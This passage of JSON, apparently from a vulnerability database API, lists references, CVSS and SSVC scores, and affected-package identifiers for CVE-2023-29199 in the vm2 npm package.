ic_textual","scoring_elements":""}],"url":"https://github.com/patriksimek/vm2"},{"reference_url":"https://github.com/patriksimek/vm2/commit/24c724daa7c09f003e556d7cd1c7a8381cb985d7","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://github.com/patriksimek/vm2/commit/24c724daa7c09f003e556d7cd1c7a8381cb985d7"},{"reference_url":"https://github.com/patriksimek/vm2/issues/516","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://github.com/patriksimek/vm2/issues/516"},{"reference_url":"https://github.com/patriksimek/vm2/releases/tag/3.9.16","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://github.com/patriksimek/vm2/releases/tag/3.9.16"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29199","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-29199"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2187409","reference_id":"2187409","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2187409"},{"reference_url":"https://github.com/advisories/GHSA-xj72-wvfv-8985","reference_id":"GHSA-xj72-wvfv-8985","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xj72-wvfv-8985"},{"reference_url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-xj72-wvfv-8985","reference_id":"GHSA-xj72-wvfv-8985","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2025-02-06T18:44:31Z/"}],"url":"https://github.com/patriksimek/vm2/security/advisories/GHSA-xj72-wvfv-8985"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/64717?format=json","purl":"pkg:npm/vm2@3.9.16","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3krt-qmqx-q7c6"},{"vulnerability":"VCID-4w6q-km6k-5bct"},{"vulnerability":"VCID-75hb-ytcw-4khu"},{"vulnerability":"VCID-8s8x-85t4-m7cg"},{"vulnerability":"VCID-d6mv-1b7h-5fef"},{"vulnerability":"VCID-ej5b-1m7b-hkf8"},{"vulnerability":"VCID-f2j1-dxbm-sfgc"},{"vulnerability":"VCID-gqm5-bhj5-k3cf"},{"vulnerability":"VCID-gqum-k4dn-fbe7"},{"vulnerability":"VCID-hhxv-v932-cuf7"},{"vulnerability":"VCID-hv69-paun-p7d7"},{"vulnerability":"VCID-ku6f-9qqg-aqe6"},{"vulnerability":"VCID-mvte-m5qa-budj"},{"vulnerability":"VCID-ng7k-8x8k-pye1"},{"vulnerability":"VCID-pytn-u4me-9bee"},{"vulnerability":"VCID-rd8s-311d-8qcq"},{"vulnerability":"VCID-t48f-zxgy-m7az"},{"vulnerability":"VCID-t5ax-32h1-13ha"},{"vulnerability":"VCID-v8ca-8eew-aqah"},{"vulnerability":"VCID-wpfa-k33c-zff4"},{"vulnerability":"VCID-ws53-29ft-u7dp"},{"vulnerability":"VCID-xe8d-un3q-myc9"},{"vulnerability":"VCID-zeup-86es-xkc4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@3.9.16"}],"aliases":["CVE-2023-29199","GHSA-xj72-wvfv-8985"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zz97-v3rg-1bck"}],"fixing_vulnerabilities":[],"risk_score":"10.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/vm2@2.0.0"}